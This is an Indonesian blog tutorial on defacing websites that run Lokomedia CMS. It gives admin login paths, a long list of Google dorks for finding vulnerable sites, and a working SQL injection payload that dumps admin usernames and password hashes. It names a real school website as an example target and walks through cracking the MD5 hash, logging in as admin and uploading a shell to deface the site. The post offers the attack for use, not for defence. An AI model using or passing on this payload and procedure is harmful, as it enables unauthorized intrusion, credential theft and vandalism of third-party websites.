-->

Belajar Cara Deface POC Lokomedia + Dork Fresh Terbaru

Monday, March 25, 2019 Add Comment
Belajar Cara Deface POC Lokomedia + Dork Fresh Terbaru

 Belajar Cara Deface Metode POC Lokomedia + Dork Fresh Terbaru - Hello sobat Gengindo.Me sekarang mau membahas tentang cara belajar tutorial deface dengan metode yang sering digunakan yaitu sql injection pada Lokomedia CMS.

Biasanya dengan deface menggunakan poc lokomedia secara kita harus memiliki admin finder login access, nah dibawah ini terdapat beberapa admin login access yang harus diketahui sebelumnya ketika akan melakukan login admin di lokomedia cms.

//site.com/admin
//site.com/adminweb
//site.com /redaktur
//site.com/administrator

Selanjutnya persiapkan bahan dork sql injection untuk deface cms lokomedia

- inurl:/statis-1-profil.html
- inurl:/statis-2-profil.html
- inurl:/statis-3-profil.html
- inurl:/hal-tentang-kami.html

Tambahan dork fresh terbaru deface metode poc lokomedia

inurl:/kategoriberita-- ext:html
inurl:hal-visi-misi.html
inurl:hal-program--kegiatan.html
inurl:hal-struktur-organisasi.html
inurl:hal-kata-sambutan.html
intext:copyright by inurl:statis-1 ext:html
inurl:statis-1-tujuan.html
inurl:/statis-10 ext:html
inurl:/statis-16 ext:html
inurl:/kategoriartikel-1-Berita ext:html
inurl:/statis-5 ext:htm
intitle:"sejarah" inurl:/sejarah ext:html
intext:"bojonegoro" inurl:/sejarah ext:html
intext:"kalimantan" inurl:/sejarah ext:html
intext:"jakarta" inurl:/sejarah ext:html
intext:"tuban" inurl:/sejarah ext:html
intext:"lamongan" inurl:/sejarah ext:html
intext:"indonesia" inurl:/sejarah ext:html
intext:"danau" inurl:/sejarah ext:html
intext:"pantai" inurl:/sejarah ext:html
intext:"wisata" inurl:/sejarah ext:html

Exploit dalam belajar cara deface poc lokomedia cms

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Berikut dibawah ini langkah-langkah cara deface menggunakan metode poc lokomedia

1. Contoh target website cms lokomedia http://www.smaitnurhidayah.sch.id/statis-1-profil.html

2. Langkah selanjutnya tinggal tambahkan exploit ke dalam website yang vuln 1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

3. Kemudian cari user akses admin login yaitu admin username dan admin password. Tekan CTRL+U lalu kemudian cari akses admin login nya seperti gambar dibawah ini

Belajar Cara Deface POC Lokomedia

4. Diatas masih terlihat password hash MD5. Kunjungi https://hashkiller.co.uk untuk mengubah password menjadi normal (decrypt).

Belajar Cara Deface POC Lokomedia + Dork Fresh Terbaru

5. Lakukan akses admin login menggunakan admin finder login access diatas

6. Setelah berhasil login ke dalam website cms lokomedia. Silahkan lakukan deface dengan menitipkan file atau mengupload shell yang anda miliki.

Nah itulah cara nya untuk anda yang pemula ingin belajar deface dengan menggunakan metode poc lokomedia. Untuk dork poc lokomedia cms website silahkan kembangkan dengan contoh dork-dork sebelumnya.

Salam sukses selalu. Jangan lupa share dan follow gengindo.me

0 Response to "Belajar Cara Deface POC Lokomedia + Dork Fresh Terbaru"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel